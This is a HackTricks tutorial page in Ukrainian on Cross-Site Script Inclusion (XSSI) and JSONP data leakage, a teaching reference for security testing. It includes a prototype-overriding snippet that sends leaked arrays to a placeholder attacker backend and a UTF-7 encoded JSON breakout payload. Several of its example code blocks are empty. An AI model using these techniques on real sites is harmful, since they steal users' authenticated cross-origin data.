# XSSI (Cross-Site Script Inclusion)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Basic Information
**Cross-Site Script Inclusion (XSSI)** — це вразливість, яка виникає через природу тегу `script` в HTML. На відміну від більшості ресурсів, які підлягають **Політиці одного походження (SOP)**, скрипти можуть бути включені з різних доменів. Ця поведінка призначена для полегшення використання бібліотек та інших ресурсів, розміщених на різних серверах, але також вводить потенційний ризик безпеки.
### Key Characteristics of **XSSI**:
- **Bypass of SOP**: Скрипти звільнені від **Політики одного походження**, що дозволяє їх включення між доменами.
- **Data Exposure**: Зловмисник може використати цю поведінку для читання даних, завантажених через тег `script`.
- **Impact on Dynamic JavaScript/JSONP**: **XSSI** особливо актуально для динамічного JavaScript або **JSON з доповненням (JSONP)**. Ці технології часто використовують інформацію "ambient-authority" (таку як куки) для аутентифікації. Коли запит скрипта надсилається на інший хост, ці облікові дані (наприклад, куки) автоматично включаються в запит.
- **Authentication Token Leakage**: Якщо зловмисник може обманути браузер користувача, щоб той надіслав запит на скрипт з сервера, який він контролює, він може отримати доступ до чутливої інформації, що міститься в цих запитах.
### Types
1. **Static JavaScript** - Це представляє собою звичайну форму XSSI.
2. **Static JavaScript with Authentication** - Цей тип відрізняється тим, що вимагає аутентифікації для доступу.
3. **Dynamic JavaScript** - Включає JavaScript, який динамічно генерує контент.
4. **Non-JavaScript** - Відноситься до вразливостей, які не пов'язані безпосередньо з JavaScript.
**Наступна інформація є резюме [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)**. Перевірте її для отримання додаткових деталей.
### Regular XSSI
У цьому підході приватна інформація вбудована в глобально доступний JavaScript файл. Зловмисники можуть виявити ці файли, використовуючи методи, такі як читання файлів, пошук за ключовими словами або регулярні вирази. Після знаходження скрипт, що містить приватну інформацію, може бути включений у шкідливий контент, що дозволяє несанкціонований доступ до чутливих даних. Приклад техніки експлуатації наведено нижче:
```html
```
### Dynamic-JavaScript-based-XSSI та Authenticated-JavaScript-XSSI
Ці типи атак XSSI передбачають динамічне додавання конфіденційної інформації до скрипту у відповідь на запит користувача. Виявлення може бути виконано шляхом надсилання запитів з і без куків та порівняння відповідей. Якщо інформація відрізняється, це може вказувати на наявність конфіденційної інформації. Цей процес можна автоматизувати за допомогою інструментів, таких як [DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) розширення Burp.
Якщо конфіденційні дані зберігаються в глобальній змінній, їх можна експлуатувати, використовуючи подібні методи до тих, що використовуються в Regular XSSI. Однак, якщо конфіденційні дані включені у відповідь JSONP, зловмисники можуть перехопити функцію зворотного виклику, щоб отримати інформацію. Це можна зробити, маніпулюючи глобальними об'єктами або налаштувавши функцію, яка буде виконана відповіддю JSONP, як показано нижче:
```html
```
```html
```
Для змінних, які не знаходяться в глобальному просторі імен, *підробка прототипу* іноді може бути використана. Ця техніка використовує дизайн JavaScript, де інтерпретація коду передбачає проходження по ланцюгу прототипів для знаходження викликаної властивості. Перезаписуючи певні функції, такі як `Array`'s `slice`, зловмисники можуть отримати доступ до не-глобальних змінних і витікати їх:
```javascript
Array.prototype.slice = function(){
// leaks ["secret1", "secret2", "secret3"]
sendToAttackerBackend(this);
};
```
Додаткові деталі про вектори атак можна знайти в роботі дослідника безпеки [Sebastian Lekies](https://twitter.com/slekies), який веде список [векторів](http://sebastian-lekies.de/leak/).
### Non-Script-XSSI
Дослідження Такеші Теради вводить ще одну форму XSSI, де файли Non-Script, такі як CSV, витікають між джерелами, будучи включеними як джерела в тег `script`. Історичні випадки XSSI, такі як атака Джеремії Гроссмана 2006 року для читання повного адресного довідника Google та витік даних JSON Джо Уокера 2007 року, підкреслюють серйозність цих загроз. Крім того, Гарет Хейз описує варіант атаки, що включає закодований у UTF-7 JSON для виходу з формату JSON та виконання скриптів, ефективний у певних браузерах:
```javascript
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]
```
```html
```
{% hint style="success" %}
Вивчайте та практикуйте AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Вивчайте та практикуйте GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Підтримайте HackTricks
* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)!
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Діліться хакерськими трюками, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на github.
{% endhint %}